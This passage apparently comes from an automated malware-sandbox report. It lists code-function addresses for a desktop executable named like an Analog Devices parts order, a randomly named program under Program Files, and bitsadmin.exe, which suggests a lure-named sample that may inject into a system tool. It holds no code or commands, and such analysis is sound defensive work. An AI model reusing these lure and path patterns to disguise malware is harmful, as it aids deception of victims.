Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700100	2_2_01700100
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C81CC	2_2_017C81CC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D01AA	2_2_017D01AA
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C41A2	2_2_017C41A2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CA352	2_2_017CA352
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E3F0	2_2_0171E3F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D03E6	2_2_017D03E6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017902C0	2_2_017902C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710535	2_2_01710535
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D0591	2_2_017D0591
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C2446	2_2_017C2446
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B4420	2_2_017B4420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BE4F6	2_2_017BE4F6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01734750	2_2_01734750
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170C7C0	2_2_0170C7C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172C6E0	2_2_0172C6E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01726962	2_2_01726962
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017DA9A6	2_2_017DA9A6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171A840	2_2_0171A840
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01712840	2_2_01712840
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E8F0	2_2_0173E8F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F68B8	2_2_016F68B8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CAB40	2_2_017CAB40
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C6BD7	2_2_017C6BD7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170EA80	2_2_0170EA80
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017ACD1F	2_2_017ACD1F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171AD00	2_2_0171AD00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170ADE0	2_2_0170ADE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01728DBF	2_2_01728DBF
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710C00	2_2_01710C00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700CF2	2_2_01700CF2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0CB5	2_2_017B0CB5
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01784F40	2_2_01784F40
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01730F30	2_2_01730F30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B2F30	2_2_017B2F30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01752F28	2_2_01752F28
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01702FC8	2_2_01702FC8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178EFA0	2_2_0178EFA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710E59	2_2_01710E59
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CEE26	2_2_017CEE26
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CEEDB	2_2_017CEEDB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01722E90	2_2_01722E90
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CCE93	2_2_017CCE93
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017DB16B	2_2_017DB16B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0174516C	2_2_0174516C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FF172	2_2_016FF172
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171B1B0	2_2_0171B1B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C70E9	2_2_017C70E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CF0E0	2_2_017CF0E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017170C0	2_2_017170C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BF0CC	2_2_017BF0CC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FD34C	2_2_016FD34C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C132D	2_2_017C132D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0175739A	2_2_0175739A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172D2F0	2_2_0172D2F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B12ED	2_2_017B12ED
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172B2C0	2_2_0172B2C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017152A0	2_2_017152A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C7571	2_2_017C7571
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D95C3	2_2_017D95C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AD5B0	2_2_017AD5B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01701460	2_2_01701460
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CF43F	2_2_017CF43F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CF7B0	2_2_017CF7B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01755630	2_2_01755630
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C16CC	2_2_017C16CC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01719950	2_2_01719950
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172B950	2_2_0172B950
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A5910	2_2_017A5910
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177D800	2_2_0177D800
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017138E0	2_2_017138E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFB76	2_2_017CFB76
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01785BF0	2_2_01785BF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0174DBF9	2_2_0174DBF9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172FB80	2_2_0172FB80
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01783A6C	2_2_01783A6C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFA49	2_2_017CFA49
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C7A46	2_2_017C7A46
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BDAC6	2_2_017BDAC6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01755AA0	2_2_01755AA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017ADAAC	2_2_017ADAAC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B1AA3	2_2_017B1AA3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C7D73	2_2_017C7D73
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C1D5A	2_2_017C1D5A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01713D40	2_2_01713D40
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172FDC0	2_2_0172FDC0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01789C32	2_2_01789C32
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFCF2	2_2_017CFCF2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFF09	2_2_017CFF09
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D3FD5	2_2_016D3FD5
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D3FD2	2_2_016D3FD2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFFB1	2_2_017CFFB1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01711F92	2_2_01711F92
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01719EB0	2_2_01719EB0
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03009832	6_2_03009832
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030099D0	6_2_030099D0
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030099DB	6_2_030099DB
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300B88B	6_2_0300B88B
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300988B	6_2_0300988B
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030120B4	6_2_030120B4
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030120F6	6_2_030120F6
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030120FB	6_2_030120FB
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_02FFFECD	6_2_02FFFECD
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0302A63B	6_2_0302A63B
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300B662	6_2_0300B662
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300B66B	6_2_0300B66B
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03013EFB	6_2_03013EFB
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DA352	7_2_030DA352
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030E03E6	7_2_030E03E6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0302E3F0	7_2_0302E3F0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C0274	7_2_030C0274
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030A02C0	7_2_030A02C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03010100	7_2_03010100
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030BA118	7_2_030BA118
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030A8158	7_2_030A8158
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030E01AA	7_2_030E01AA
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D81CC	7_2_030D81CC
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030B2000	7_2_030B2000
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03044750	7_2_03044750
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03020770	7_2_03020770
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0301C7C0	7_2_0301C7C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303C6E0	7_2_0303C6E0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03020535	7_2_03020535
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030E0591	7_2_030E0591
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C4420	7_2_030C4420
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D2446	7_2_030D2446
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030CE4F6	7_2_030CE4F6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DAB40	7_2_030DAB40
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D6BD7	7_2_030D6BD7
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0301EA80	7_2_0301EA80
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03036962	7_2_03036962
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030229A0	7_2_030229A0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030EA9A6	7_2_030EA9A6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03022840	7_2_03022840
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0302A840	7_2_0302A840
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030068B8	7_2_030068B8
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0304E8F0	7_2_0304E8F0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03062F28	7_2_03062F28
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03040F30	7_2_03040F30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C2F30	7_2_030C2F30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03094F40	7_2_03094F40
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0309EFA0	7_2_0309EFA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03012FC8	7_2_03012FC8
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DEE26	7_2_030DEE26
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03020E59	7_2_03020E59
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03032E90	7_2_03032E90
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DCE93	7_2_030DCE93
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DEEDB	7_2_030DEEDB
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0302AD00	7_2_0302AD00
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030BCD1F	7_2_030BCD1F
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03038DBF	7_2_03038DBF
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0301ADE0	7_2_0301ADE0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03020C00	7_2_03020C00
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C0CB5	7_2_030C0CB5
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03010CF2	7_2_03010CF2
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D132D	7_2_030D132D
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0300D34C	7_2_0300D34C
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0306739A	7_2_0306739A
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030252A0	7_2_030252A0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303B2C0	7_2_0303B2C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C12ED	7_2_030C12ED
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303D2F0	7_2_0303D2F0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030EB16B	7_2_030EB16B
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0305516C	7_2_0305516C
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0300F172	7_2_0300F172
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0302B1B0	7_2_0302B1B0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030CF0CC	7_2_030CF0CC
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030270C0	7_2_030270C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D70E9	7_2_030D70E9
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DF0E0	7_2_030DF0E0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DF7B0	7_2_030DF7B0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D16CC	7_2_030D16CC
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D7571	7_2_030D7571
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030BD5B0	7_2_030BD5B0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DF43F	7_2_030DF43F
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03011460	7_2_03011460
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFB76	7_2_030DFB76
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303FB80	7_2_0303FB80
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03095BF0	7_2_03095BF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0305DBF9	7_2_0305DBF9
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFA49	7_2_030DFA49
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D7A46	7_2_030D7A46
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03093A6C	7_2_03093A6C
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03065AA0	7_2_03065AA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030BDAAC	7_2_030BDAAC
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C1AA3	7_2_030C1AA3
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030CDAC6	7_2_030CDAC6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030B5910	7_2_030B5910
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03029950	7_2_03029950
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303B950	7_2_0303B950
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0308D800	7_2_0308D800
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030238E0	7_2_030238E0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFF09	7_2_030DFF09
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03021F92	7_2_03021F92
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFFB1	7_2_030DFFB1
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE3FD5	7_2_02FE3FD5
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE3FD2	7_2_02FE3FD2
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03029EB0	7_2_03029EB0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03023D40	7_2_03023D40
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D1D5A	7_2_030D1D5A
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D7D73	7_2_030D7D73
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303FDC0	7_2_0303FDC0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03099C32	7_2_03099C32
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFCF2	7_2_030DFCF2
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B1A90	7_2_006B1A90
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AC8C7	7_2_006AC8C7
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AC8D0	7_2_006AC8D0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AAAF0	7_2_006AAAF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006ACAF0	7_2_006ACAF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AAC40	7_2_006AAC40
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AAC35	7_2_006AAC35
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B5160	7_2_006B5160
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006A1132	7_2_006A1132
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B3360	7_2_006B3360
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B335B	7_2_006B335B
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B3319	7_2_006B3319
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006CB8A0	7_2_006CB8A0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DEE1F8	7_2_00DEE1F8
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DEE316	7_2_00DEE316
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DEE313	7_2_00DEE313
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DEE60C	7_2_00DEE60C
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DED778	7_2_00DED778

Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 03055130 appears 58 times
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 0309F290 appears 103 times
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 0308EA12 appears 86 times
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 03067E54 appears 99 times
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 0300B970 appears 262 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 01757E54 appears 107 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 016FB970 appears 262 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 0178F290 appears 103 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 01745130 appears 58 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 0177EA12 appears 86 times

